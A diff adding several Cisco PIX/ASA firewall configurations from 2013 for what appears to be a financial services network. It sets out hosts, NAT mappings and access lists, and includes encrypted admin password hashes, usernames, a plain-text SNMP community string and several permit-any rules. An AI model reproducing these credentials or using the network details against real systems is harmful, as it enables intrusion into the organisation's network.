+access-list mgmt_access_in extended permit icmp ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_3 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_4 
+access-list mgmt_access_in extended permit icmp any any 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_13 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_14 
+access-list mgmt_access_in extended permit tcp host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list mgmt_access_in extended permit tcp host enMORE-srvr2 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list mgmt_access_in extended permit udp host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list mgmt_access_in extended permit udp host enMORE-srvr2 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list mgmt_access_in extended permit ip host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list mgmt_access_in extended permit ip host enMORE-srvr3 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list mgmt_access_in extended permit ip host enMORE-srvr4 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 host en.MoreWebSRVR1 
+access-list mgmt_access_in extended permit icmp ensb-dxb-mgmt-nw 255.255.255.0 host en.MoreWebSRVR1 
+access-list finmex_access_in remark Tempo Access List to update windows
+access-list finmex_access_in extended permit tcp host enMORE-srvr4 object-group RemitONE-Srvrs eq https 
+access-list finmex_access_in extended permit ip host finmex-srv1 finmex-mgmt-nw 255.255.255.0 
+access-list finmex_access_in extended permit tcp host finmex-srv1 any object-group web-ports 
+access-list finmex_access_in extended permit tcp host finmex-srv1 any eq ftp 
+access-list finmex_access_in extended permit object-group DM_INLINE_PROTOCOL_2 host finmex-srv1 any eq domain 
+access-list finmex_access_in extended permit icmp host finmex-srv1 any 
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_1 host finmex-srv1 object-group DM_INLINE_NETWORK_5 
+access-list finmex_access_in remark Access List between en.More Servers and en.More Web Server
+access-list finmex_access_in extended permit ip object-group en.More-srvr object-group en.More_Web_Servers inactive 
+access-list finmex_access_in remark Access List between en.More Servers and en.More Web Server
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_6 object-group en.More-srvr object-group en.More_Web_Servers 
+access-list finmex_access_in extended permit icmp object-group en.More-srvr host 192.168.214.245 
+access-list finmex_access_in extended permit tcp host enMORE-srvr1 host SL1 eq ftp inactive 
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_4 object-group en.More-srvr object-group DM_INLINE_NETWORK_23 
+access-list finmex_access_in extended permit icmp object-group en.More-srvr any 
+access-list finmex_access_in extended permit icmp host enMORE-srvr2 any inactive 
+access-list finmex_access_in extended permit ip object-group en.More-srvr ensb-dxb-mgmt-nw 255.255.255.0 inactive 
+access-list finmex_access_in extended permit tcp object-group en.More-srvr object-group DM_INLINE_NETWORK_6 object-group DM_INLINE_TCP_4 
+access-list finmex_access_in remark Internet Access - For Licensing Only. To be disabled after use. AD
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_2 object-group en.More-srvr any inactive 
+access-list finmex_access_in remark Internet Access - For Licensing Only. To be disabled after use. AD
+access-list finmex_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group en.More-srvr any eq domain inactive 
+access-list finmex_access_in extended permit tcp object-group en.More-srvr object-group ftp-srv_ref-finmex object-group DM_INLINE_TCP_5 
+access-list finmex_access_in remark Internet Access - For Licensing Only. To be disabled after use. AD
+access-list finmex_access_in extended permit tcp object-group en.More-srvr any eq ftp inactive 
+access-list finmex_access_in extended permit ip object-group en.More-srvr object-group ftp-srv_ref-finmex 
+access-list finmex_access_in extended permit tcp object-group DM_INLINE_NETWORK_15 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list finmex_access_in extended permit tcp object-group DM_INLINE_NETWORK_16 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list finmex_access_in extended permit udp object-group DM_INLINE_NETWORK_17 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list finmex_access_in extended permit udp object-group DM_INLINE_NETWORK_18 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list finmex_access_in extended permit ip host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list finmex_access_in extended permit ip object-group DM_INLINE_NETWORK_12 object-group DM_INLINE_NETWORK_24 
+pager lines 20
+logging enable
+logging asdm errors
+mtu clients 1500
+mtu host 1500
+mtu sag 1500
+mtu unirisx 1500
+mtu mgmt 1500
+mtu finmex 1500
+failover
+failover lan unit primary
+icmp unreachable rate-limit 1 burst-size 1
+icmp permit any finmex
+asdm image flash:/asdm-602.bin
+asdm location sag-srv2 255.255.255.255 sag
+asdm location sagfin1 255.255.255.255 sag
+asdm location vpn1-int 255.255.255.255 clients
+asdm location vpn2-int 255.255.255.255 clients
+asdm location vpn1-2-nsrp 255.255.255.255 clients
+asdm location sagsns1 255.255.255.255 sag
+asdm group sag-servers-prod sag
+asdm group ensb-vpns-group clients
+asdm group sag-srv-test sag
+asdm group sag-servers-prod_ref clients reference sag-servers-prod
+asdm group ensb-dxb-nw clients
+no asdm history enable
+arp timeout 14400
+static (host,clients) host-srv1 ensbusl1 netmask 255.255.255.255 
+static (host,clients) host-srv2 ensbusl2 netmask 255.255.255.255 
+static (host,clients) host-srv3 ensbusl3 netmask 255.255.255.255 
+static (unirisx,clients) 192.168.211.201 unirisx-srv1 netmask 255.255.255.255 
+static (unirisx,clients) 192.168.211.202 unirisx-srv2 netmask 255.255.255.255 
+static (unirisx,clients) 192.168.211.203 unirisx-srv3 netmask 255.255.255.255 
+static (host,sag) 192.168.202.50 host-srv1 netmask 255.255.255.255 
+static (host,sag) 192.168.202.51 host-srv2 netmask 255.255.255.255 
+static (host,sag) 192.168.202.52 host-srv3 netmask 255.255.255.255 
+static (sag,finmex) 192.168.214.25 sagfin2 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.22 sagsns1 netmask 255.255.255.255 
+static (finmex,clients) 192.168.211.100 finmex-srv1 netmask 255.255.255.255 
+static (finmex,sag) finmex-srv1 finmex-srv1 netmask 255.255.255.255 
+static (mgmt,finmex) 192.168.214.10 192.168.208.10 netmask 255.255.255.255 
+static (mgmt,finmex) 192.168.214.11 192.168.208.11 netmask 255.255.255.255 
+static (finmex,clients) 192.168.211.105 enMORE-srvr1 netmask 255.255.255.255 
+static (host,finmex) SL1 host-srv2 netmask 255.255.255.255 
+static (finmex,clients) 192.168.211.106 enMORE-srvr2 netmask 255.255.255.255 
+static (sag,host) 192.168.209.25 sagfin1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.25 sag-srv2 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.208 192.168.200.208 netmask 255.255.255.255 
+static (sag,host) 192.168.209.208 192.168.200.208 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.21 sagtest1 netmask 255.255.255.255 
+static (sag,finmex) 192.168.214.21 sagtest1 netmask 255.255.255.255 
+static (sag,host) 192.168.209.21 sagtest1 netmask 255.255.255.255 
+static (sag,host) 192.168.209.22 sagsns1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.115 enFTP1 netmask 255.255.255.255 
+static (sag,finmex) 192.168.214.245 enFTP1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.111 192.168.202.11 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.28 swp-srv1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.29 swp-srv2 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.30 swp-nlb netmask 255.255.255.255 
+static (host,clients) 192.168.211.31 CAGP-SRV2 netmask 255.255.255.255 
+static (host,clients) 192.168.211.32 CAGP-SRV1 netmask 255.255.255.255 
+static (finmex,clients) enMORE-srvr3 enMORE-srvr3 netmask 255.255.255.255 
+static (finmex,clients) enMORE-srvr4 enMORE-srvr4 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.101 ensbdrsa2 netmask 255.255.255.255 
+access-group clients_access_in in interface clients
+access-group Hosting in interface host
+access-group sag_access_in in interface sag
+access-group unirisx_access_in in interface unirisx
+access-group mgmt_access_in in interface mgmt
+access-group finmex_access_in in interface finmex
+route clients 0.0.0.0 0.0.0.0 vpn1-2-nsrp 1
+route sag 10.149.11.0 255.255.255.0 192.168.202.1 1
+route clients ensb-us-nw 255.255.255.0 vpn1-2-nsrp 1
+route sag 192.168.200.0 255.255.255.0 192.168.202.1 2
+route sag ensb-dxb-mgmt-nw 255.255.255.0 192.168.202.1 5
+route sag 192.168.216.22 255.255.255.255 192.168.202.1 2
+route sag 192.168.216.25 255.255.255.255 192.168.202.1 2
+route sag 192.168.216.33 255.255.255.255 192.168.202.1 2
+route sag 192.168.218.0 255.255.255.0 192.168.202.1 2
+route clients BICs-HomeSend-Prod 255.255.255.255 vpn1-2-nsrp 1
+route clients BICs-HomeSend-Test 255.255.255.255 vpn1-2-nsrp 1
+timeout xlate 3:00:00
+timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
+timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
+timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
+timeout uauth 0:05:00 absolute
+dynamic-access-policy-record DfltAccessPolicy
+http server enable
+http 192.168.209.0 255.255.255.0 host
+http 192.168.202.0 255.255.255.0 sag
+http ensb-dxb-mgmt-nw 255.255.255.0 mgmt
+snmp-server host mgmt 192.168.208.11 community ^enSBSXstr1ng^
+no snmp-server location
+no snmp-server contact
+snmp-server enable traps snmp authentication linkup linkdown coldstart
+no crypto isakmp nat-traversal
+telnet 192.168.209.0 255.255.255.0 host
+telnet 192.168.202.0 255.255.255.0 sag
+telnet ensb-dxb-mgmt-nw 255.255.255.0 mgmt
+telnet timeout 5
+ssh 192.168.208.11 255.255.255.255 mgmt
+ssh timeout 5
+console timeout 0
+threat-detection basic-threat
+threat-detection statistics access-list
+!
+class-map inspection_default
+ match default-inspection-traffic
+!
+!
+policy-map type inspect dns preset_dns_map
+ parameters
+  message-length maximum 512
+policy-map global_policy
+ class inspection_default
+  inspect dns preset_dns_map 
+  inspect ftp 
+  inspect h323 h225 
+  inspect h323 ras 
+  inspect netbios 
+  inspect rsh 
+  inspect rtsp 
+  inspect skinny  
+  inspect esmtp 
+  inspect sqlnet 
+  inspect sunrpc 
+  inspect tftp 
+  inspect sip  
+  inspect xdmcp 
+!
+service-policy global_policy global
+tftp-server mgmt 192.168.208.10 /
+username kbaluyot password veUjjfuhoN5j6Rty encrypted privilege 15
+prompt hostname context 
+Cryptochecksum:8ddccd69852ef5593991d48ba55c81e9
+: end

swift/00715_0_ensbdfw5-2013sep06

@@ -0,0 +1,334 @@
+: Saved
+: Written by adesear at 21:56:15.192 UTC Thu Sep 5 2013
+!
+PIX Version 8.0(2) 
+!
+hostname ENSBUSPIX2
+enable password Ro5XpDeSuehPBEdi encrypted
+names
+name 192.168.208.10 mgmt-srv1
+name 192.168.208.11 mgmt-srv2
+name 192.168.221.237 ensbdswapp-clus
+name 192.168.221.238 ensbdswapp1
+name 192.168.221.239 ensbdswapp2
+name 192.168.221.240 ensbdswdb-clus
+name 192.168.221.241 ensbdswdb1
+name 192.168.221.242 ensbdswdb2
+name 10.100.200.0 ensb-mgmt-nw
+name 10.149.10.0 nw-sslvpn-nw
+name 202.40.237.146 telepin-app-srv1
+name 202.40.237.153 telepin-ftp-srv1
+name 10.159.9.146 singprod-user1
+name 10.159.9.155 singprod-user10
+name 10.159.9.147 singprod-user2
+name 10.159.9.148 singprod-user3
+name 10.159.9.149 singprod-user4
+name 10.159.9.150 singprod-user5
+name 10.159.9.151 singprod-user6
+name 10.159.9.152 singprod-user7
+name 10.159.9.153 singprod-user8
+name 10.159.9.154 singprod-user9
+!
+interface Ethernet0
+ nameif clients
+ security-level 10
+ ip address 192.168.211.5 255.255.255.0 
+!
+interface Ethernet1
+ nameif swaas
+ security-level 50
+ ip address 192.168.221.5 255.255.255.0 
+!
+interface Ethernet2
+ shutdown
+ nameif finmex
+ security-level 50
+ ip address 192.168.214.5 255.255.255.0 
+!
+interface Ethernet3
+ shutdown
+ no nameif
+ no security-level
+ no ip address
+!
+interface Ethernet4
+ description mgmt zone
+ nameif mgmt
+ security-level 90
+ ip address 192.168.208.5 255.255.255.0 
+!
+interface Ethernet5
+ no nameif
+ no security-level
+ no ip address
+!
+interface Ethernet5.1
+ shutdown
+ no vlan
+ no nameif
+ no security-level
+ no ip address
+!
+interface Ethernet5.2
+ shutdown
+ no vlan
+ no nameif
+ no security-level
+ no ip address
+!
+interface Ethernet5.3
+ shutdown
+ no vlan
+ no nameif
+ no security-level
+ no ip address
+!
+passwd Ro5XpDeSuehPBEdi encrypted
+ftp mode passive
+object-group network mgmt-srv-group
+ network-object host mgmt-srv1
+ network-object host mgmt-srv2
+object-group network safe-srv-group
+ network-object host ensbdswapp-clus
+ network-object host ensbdswapp1
+ network-object host ensbdswapp2
+ network-object host ensbdswdb-clus
+ network-object host ensbdswdb1
+ network-object host ensbdswdb2
+object-group network safeapp-srv-group
+ network-object host ensbdswapp-clus
+ network-object host ensbdswapp1
+ network-object host ensbdswapp2
+object-group network safeapp-srv-group-ref_clients
+ network-object host 192.168.211.237
+ network-object host 192.168.211.238
+ network-object host 192.168.211.239
+object-group network safedb-srv-group
+ network-object host ensbdswdb-clus
+ network-object host ensbdswdb1
+ network-object host ensbdswdb2
+object-group network safe-srv-group-ref_clients
+ network-object host 192.168.211.237
+ network-object host 192.168.211.238
+ network-object host 192.168.211.239
+ network-object host 192.168.211.240
+ network-object host 192.168.211.241
+ network-object host 192.168.211.242
+object-group network finmex-mgmt-grp
+ network-object host 10.100.215.11
+ network-object host 10.100.215.12
+ network-object host 10.100.215.13
+ network-object host 10.100.215.14
+ network-object host 10.100.215.15
+object-group service rdp
+ service-object tcp eq 3389 
+object-group network sw-support-grp
+ network-object host 10.100.225.11
+ network-object host 10.100.225.12
+ network-object host 10.100.225.13
+ network-object host 10.100.225.14
+ network-object host 10.100.225.15
+ network-object host 10.100.225.16
+ network-object host 10.100.225.18
+ network-object host 10.100.225.19
+ network-object host 10.100.225.20
+object-group service safewatch-tcp tcp
+ port-object eq 1443
+ port-object eq 8080
+ port-object eq 8401
+ port-object eq https
+ port-object eq 8330
+ port-object eq 8336
+object-group service safewatch-udp udp
+ port-object eq 8400
+object-group service DM_INLINE_TCP_1 tcp
+ port-object eq ftp
+ port-object eq ssh
+object-group network singprod-users-grp
+ network-object host 10.159.9.136
+ network-object host 10.159.9.137
+ network-object host 10.159.9.138
+ network-object host 10.159.9.139
+ network-object host 10.159.9.140
+ network-object host 10.159.9.141
+ network-object host 10.159.9.142
+ network-object host 10.159.9.143
+ network-object host 10.159.9.144
+ network-object host 10.159.9.145
+object-group network sw-users-grp
+ group-object singprod-users-grp
+object-group service DM_INLINE_TCP_2 tcp
+ port-object eq ftp
+ port-object eq ssh
+object-group network swaas-support-grp
+ network-object host 10.100.225.11
+ network-object host 10.100.225.12
+ network-object host 10.100.225.13
+ network-object host 10.100.225.14
+ network-object host 10.100.225.15
+ network-object host 10.100.225.16
+ network-object host 10.100.225.17
+ network-object host 10.100.225.18
+ network-object host 10.100.225.19
+ network-object host 10.100.225.20
+object-group network swaas-users-grp
+ group-object singprod-users-grp
+access-list clients_access_in extended permit tcp host telepin-app-srv1 object-group safeapp-srv-group-ref_clients object-group safewatch-tcp 
+access-list clients_access_in extended permit udp host telepin-app-srv1 object-group safeapp-srv-group-ref_clients object-group safewatch-udp 
+access-list clients_access_in extended permit tcp object-group swaas-users-grp object-group safeapp-srv-group-ref_clients object-group safewatch-tcp 
+access-list clients_access_in extended permit udp object-group swaas-users-grp object-group safeapp-srv-group-ref_clients object-group safewatch-udp 
+access-list clients_access_in extended permit tcp object-group sw-users-grp object-group safeapp-srv-group-ref_clients object-group safewatch-tcp 
+access-list clients_access_in extended permit udp object-group sw-users-grp object-group safeapp-srv-group-ref_clients object-group safewatch-udp 
+access-list clients_access_in extended permit icmp 192.168.211.0 255.255.255.0 object-group safe-srv-group-ref_clients inactive 
+access-list clients_access_in extended permit object-group rdp object-group swaas-support-grp object-group safe-srv-group-ref_clients 
+access-list clients_access_in extended permit tcp object-group swaas-support-grp object-group safe-srv-group-ref_clients object-group safewatch-tcp 
+access-list clients_access_in extended permit udp object-group swaas-support-grp object-group safe-srv-group-ref_clients object-group safewatch-udp 
+access-list clients_access_in extended permit icmp object-group swaas-support-grp object-group safe-srv-group-ref_clients 
+access-list clients_access_in extended permit ip 192.168.216.0 255.255.255.0 any 
+access-list clients_access_in extended permit ip ensb-mgmt-nw 255.255.255.0 any 
+access-list clients_access_in extended permit icmp any object-group safe-srv-group-ref_clients 
+access-list swaas_access_in extended permit icmp any any 
+access-list swaas_access_in extended permit tcp object-group safeapp-srv-group host telepin-ftp-srv1 object-group DM_INLINE_TCP_1 
+access-list swaas_access_in extended permit tcp object-group safeapp-srv-group host 202.40.237.145 object-group DM_INLINE_TCP_2 
+access-list swaas_access_in extended permit ip any any 
+access-list mgmt_access_in extended permit ip any any 
+access-list mgmt_access_in remark Implicit rule: Permit all traffic to less secure networks
+access-list mgmt_access_in extended permit icmp any any 
+pager lines 24
+logging enable
+mtu clients 1500
+mtu swaas 1500
+mtu finmex 1500
+mtu mgmt 1500
+no failover
+icmp unreachable rate-limit 1 burst-size 1
+asdm image flash:/asdm-602.bin
+no asdm history enable
+arp timeout 14400
+static (swaas,clients) 192.168.211.240 ensbdswdb-clus netmask 255.255.255.255 dns 
+static (swaas,clients) 192.168.211.241 ensbdswdb1 netmask 255.255.255.255 dns 
+static (swaas,clients) 192.168.211.242 ensbdswdb2 netmask 255.255.255.255 dns 
+static (swaas,clients) 192.168.211.237 ensbdswapp1 netmask 255.255.255.255 dns 
+access-group clients_access_in in interface clients
+access-group swaas_access_in in interface swaas
+access-group mgmt_access_in in interface mgmt
+route clients 0.0.0.0 0.0.0.0 192.168.211.17 1
+timeout xlate 3:00:00
+timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
+timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
+timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
+timeout uauth 0:05:00 absolute
+dynamic-access-policy-record DfltAccessPolicy
+aaa authentication enable console LOCAL 
+aaa authentication http console LOCAL 
+aaa authentication ssh console LOCAL 
+aaa authentication telnet console LOCAL 
+aaa authorization command LOCAL 
+aaa authorization exec authentication-server
+http server enable
+http 192.168.208.0 255.255.255.0 mgmt
+http 192.168.211.15 255.255.255.255 clients
+http 192.168.211.17 255.255.255.255 clients
+http ensb-mgmt-nw 255.255.255.0 clients
+snmp-server host mgmt mgmt-srv2 community ^enSBSXstr1ng^
+no snmp-server location
+no snmp-server contact
+snmp-server enable traps snmp authentication linkup linkdown coldstart
+no crypto isakmp nat-traversal
+telnet 192.168.208.0 255.255.255.0 mgmt
+telnet timeout 5
+ssh 192.168.208.0 255.255.255.0 mgmt
+ssh timeout 5
+console timeout 0
+threat-detection basic-threat
+threat-detection statistics access-list
+!
+class-map inspection_default
+ match default-inspection-traffic
+!
+!
+policy-map type inspect dns preset_dns_map
+ parameters
+  message-length maximum 512
+policy-map global_policy
+ class inspection_default
+  inspect dns preset_dns_map 
+  inspect ftp 
+  inspect h323 h225 
+  inspect h323 ras 
+  inspect netbios 
+  inspect rsh 
+  inspect rtsp 
+  inspect skinny  
+  inspect esmtp 
+  inspect sqlnet 
+  inspect sunrpc 
+  inspect tftp 
+  inspect sip  
+  inspect xdmcp 
+!
+service-policy global_policy global
+tftp-server mgmt mgmt-srv1 /
+username adesear password AyUoUtKt1Ge6y1xo encrypted privilege 15
+username kbaluyot password veUjjfuhoN5j6Rty encrypted privilege 15
+username msaeed password HrG.2XeAt0pheILG encrypted privilege 15
+username jeromuy password HW2JCVi8GLASfsTQ encrypted privilege 15
+privilege cmd level 3 mode exec command perfmon
+privilege cmd level 3 mode exec command ping
+privilege cmd level 3 mode exec command who
+privilege cmd level 3 mode exec command logging
+privilege cmd level 3 mode exec command failover
+privilege show level 5 mode exec command running-config
+privilege show level 3 mode exec command reload
+privilege show level 3 mode exec command mode
+privilege show level 3 mode exec command firewall
+privilege show level 3 mode exec command interface
+privilege show level 3 mode exec command clock
+privilege show level 3 mode exec command dns-hosts
+privilege show level 3 mode exec command access-list
+privilege show level 3 mode exec command logging
+privilege show level 3 mode exec command ip
+privilege show level 3 mode exec command failover
+privilege show level 3 mode exec command asdm
+privilege show level 3 mode exec command arp
+privilege show level 3 mode exec command route
+privilege show level 3 mode exec command ospf
+privilege show level 3 mode exec command aaa-server
+privilege show level 3 mode exec command aaa
+privilege show level 3 mode exec command eigrp
+privilege show level 3 mode exec command crypto
+privilege show level 3 mode exec command vpn-sessiondb
+privilege show level 3 mode exec command ssh
+privilege show level 3 mode exec command dhcpd
+privilege show level 3 mode exec command vpn
+privilege show level 3 mode exec command blocks
+privilege show level 3 mode exec command wccp
+privilege show level 3 mode exec command uauth
+privilege show level 3 mode configure command interface
+privilege show level 3 mode configure command clock
+privilege show level 3 mode configure command access-list
+privilege show level 3 mode configure command logging
+privilege show level 3 mode configure command ip
+privilege show level 3 mode configure command failover
+privilege show level 5 mode configure command asdm
+privilege show level 3 mode configure command arp
+privilege show level 3 mode configure command route
+privilege show level 3 mode configure command aaa-server
+privilege show level 3 mode configure command aaa
+privilege show level 3 mode configure command crypto
+privilege show level 3 mode configure command ssh
+privilege show level 3 mode configure command dhcpd
+privilege show level 5 mode configure command privilege
+privilege clear level 3 mode exec command dns-hosts
+privilege clear level 3 mode exec command logging
+privilege clear level 3 mode exec command arp
+privilege clear level 3 mode exec command aaa-server
+privilege clear level 3 mode exec command crypto
+privilege cmd level 3 mode configure command failover
+privilege clear level 3 mode configure command logging
+privilege clear level 3 mode configure command arp
+privilege clear level 3 mode configure command crypto
+privilege clear level 3 mode configure command aaa-server
+prompt hostname context 
+Cryptochecksum:360d731107f25722f1ef9d57dc61a1bb
+: end

swift/00720_0_ensbdpix3-31aug2013

@@ -0,0 +1,372 @@
+: Saved
+: Written by enable_15 at 10:28:08.961 UTC Sat Aug 31 2013
+PIX Version 6.3(5)
+interface ethernet0 100full
+interface ethernet1 100full
+interface ethernet2 100full
+interface ethernet3 100full
+interface ethernet4 100full
+interface ethernet5 100full
+nameif ethernet0 clients security10
+nameif ethernet1 paygate security80
+nameif ethernet2 host security90
+nameif ethernet3 dmz security70
+nameif ethernet4 smartstream security20
+nameif ethernet5 mgmt security95
+enable password Ro5XpDeSuehPBEdi encrypted
+passwd Ro5XpDeSuehPBEdi encrypted
+hostname ENSBDPIX3
+domain-name ciscopix.com
+fixup protocol dns maximum-length 512
+fixup protocol ftp 21
+fixup protocol h323 h225 1720
+fixup protocol h323 ras 1718-1719
+fixup protocol http 80
+fixup protocol rsh 514
+fixup protocol rtsp 554
+fixup protocol sip 5060
+fixup protocol sip udp 5060
+fixup protocol skinny 2000
+fixup protocol smtp 25
+fixup protocol sqlnet 1521
+fixup protocol tftp 69
+names
+name 192.168.201.207 pg-qtel
+name 192.168.201.205 pg-dgcx
+name 192.168.201.201 pg-arcapita
+name 192.168.218.209 endssdb1
+name 192.168.218.208 endssapp1
+name 10.155.0.0 ss-client-nw
+name 192.168.200.166 ensbdnbcr2
+name 192.168.200.165 ensbdnbcr1
+name 10.149.7.0 pg-sslvpn-nw
+name 10.149.3.0 fmhs-sslvpn-nw
+name 10.149.11.0 nw-sslvpn-nw
+name 10.149.13.0 ins-sslvpn-nw
+name 192.168.200.104 sl3
+name 192.168.200.245 ftp
+name 192.168.203.215 ensbdtasw1
+name 10.153.4.64 qfqf-gnat-nw
+name 192.168.208.10 ensbdmgmt1
+name 192.168.208.11 ensbdmgmt2
+object-group network smartstream-srv-group 
+  network-object endssapp1 255.255.255.255 
+  network-object endssdb1 255.255.255.255 
+object-group service ss-services tcp 
+  port-object eq 10000 
+  port-object eq ftp 
+  port-object eq 30003 
+access-list dmz_access_in permit ip any any 
+access-list dmz_access_in permit icmp any any 
+access-list dmz_access_in remark To be removed after the activiation
+access-list dmz_access_in permit ip host ensbdtasw1 any 
+access-list dmz_access_in remark To be removed after the activiation
+access-list dmz_access_in permit icmp host ensbdtasw1 any 
+access-list paygate_access_in permit ip any any 
+access-list paygate_access_in permit icmp any any 
+access-list clients_access_in permit tcp nw-sslvpn-nw 255.255.255.0 host 192.168.206.208 object-group ss-services 
+access-list clients_access_in permit tcp ins-sslvpn-nw 255.255.255.0 host 192.168.206.208 object-group ss-services 
+access-list clients_access_in permit tcp ss-client-nw 255.255.0.0 host 192.168.206.208 object-group ss-services 
+access-list clients_access_in permit icmp any any 
+access-list clients_access_in permit tcp any any eq www 
+access-list clients_access_in permit tcp any any eq https 
+access-list clients_access_in remark 
+access-list clients_access_in permit tcp 10.71.0.0 255.255.0.0 any eq 3389 
+access-list clients_access_in remark 
+access-list clients_access_in permit tcp 10.72.0.0 255.255.0.0 any eq 3389 
+access-list clients_access_in permit tcp 10.149.0.0 255.255.0.0 any eq 3389 
+access-list clients_access_in remark ACCESS FROM OLD CAGE - KXB 21JULY2010
+access-list clients_access_in permit ip 192.168.106.0 255.255.254.0 any 
+access-list clients_access_in permit tcp qfqf-gnat-nw 255.255.255.192 host 192.168.206.230 eq www 
+access-list host_access_in permit icmp any any 
+access-list host_access_in permit ip any any 
+access-list smartstream_access_in permit ip any any 
+access-list smartstream_access_in permit icmp any any 
+access-list mgmt_access_in permit ip any any 
+access-list mgmt_access_in permit icmp any any 
+pager lines 20
+logging history informational
+mtu clients 1500
+mtu paygate 1500
+mtu host 1500
+mtu dmz 1500
+mtu smartstream 1500
+mtu mgmt 1500
+ip address clients 192.168.206.3 255.255.255.0
+ip address paygate 192.168.201.3 255.255.255.0
+ip address host 192.168.200.3 255.255.255.0
+ip address dmz 192.168.203.3 255.255.255.0
+ip address smartstream 192.168.218.3 255.255.255.0
+ip address mgmt 192.168.208.3 255.255.255.0
+ip audit info action alarm
+ip audit attack action alarm
+failover
+failover timeout 0:00:00
+failover poll 15
+failover ip address clients 192.168.206.252
+failover ip address paygate 192.168.201.252
+failover ip address host 192.168.200.252
+failover ip address dmz 192.168.203.252
+failover ip address smartstream 192.168.218.252
+failover ip address mgmt 192.168.208.252
+pdm location 0.0.0.0 0.0.0.0 host
+pdm location 192.168.200.33 255.255.255.255 host
+pdm location 192.168.200.34 255.255.255.255 host
+pdm location 192.168.200.59 255.255.255.255 host
+pdm location 192.168.200.62 255.255.255.255 host
+pdm location pg-arcapita 255.255.255.255 paygate
+pdm location 192.168.201.203 255.255.255.255 paygate
+pdm location pg-dgcx 255.255.255.255 paygate
+pdm location 192.168.200.35 255.255.255.255 paygate
+pdm location 192.168.200.201 255.255.255.255 host
+pdm location 192.168.201.35 255.255.255.255 paygate
+pdm location 192.168.200.203 255.255.255.255 host
+pdm location 192.168.200.205 255.255.255.255 host
+pdm location 192.168.203.201 255.255.255.255 dmz
+pdm location 192.168.206.201 255.255.255.255 clients
+pdm location 192.168.206.203 255.255.255.255 clients
+pdm location 192.168.206.205 255.255.255.255 clients
+pdm location 192.168.201.110 255.255.255.255 paygate
+pdm location 192.168.202.249 255.255.255.255 host
+pdm location 192.168.202.249 255.255.255.255 paygate
+pdm location 192.168.202.249 255.255.255.255 dmz
+pdm location 192.168.202.249 255.255.255.255 clients
+pdm location 192.168.206.220 255.255.255.255 clients
+pdm location 192.168.206.225 255.255.255.255 clients
+pdm location 192.168.203.220 255.255.255.255 dmz
+pdm location 192.168.203.225 255.255.255.255 dmz
+pdm location 192.168.200.51 255.255.255.255 host
+pdm location 192.168.200.71 255.255.255.255 host
+pdm location pg-qtel 255.255.255.255 paygate
+pdm location 192.168.200.207 255.255.255.255 host
+pdm location 192.168.206.207 255.255.255.255 clients
+pdm location 192.168.200.25 255.255.255.255 host
+pdm location 192.168.200.20 255.255.255.255 host
+pdm location 10.72.110.0 255.255.255.0 clients
+pdm location 192.168.203.230 255.255.255.255 dmz
+pdm location 192.168.200.22 255.255.255.255 host
+pdm location 0.0.0.0 255.0.0.0 clients
+pdm location 10.71.120.0 255.255.255.0 clients
+pdm location 192.168.203.0 255.255.255.0 dmz
+pdm location 192.168.200.72 255.255.255.255 host
+pdm location 192.168.203.235 255.255.255.255 dmz
+pdm location 192.168.200.52 255.255.255.255 host
+pdm location 192.168.200.95 255.255.255.255 host
+pdm location 192.168.200.96 255.255.255.255 host
+pdm location 192.168.206.235 255.255.255.255 clients
+pdm location 192.168.201.111 255.255.255.255 paygate
+pdm location 192.168.201.112 255.255.255.255 paygate
+pdm location 192.168.200.35 255.255.255.255 host
+pdm location 192.168.200.10 255.255.255.255 host
+pdm location 192.168.200.11 255.255.255.255 host
+pdm location 192.168.200.11 255.255.255.255 dmz
+pdm location 192.168.203.110 255.255.255.255 dmz
+pdm location 192.168.203.111 255.255.255.255 dmz
+pdm location nw-sslvpn-nw 255.255.255.0 clients
+pdm location 10.154.0.0 255.255.0.0 clients
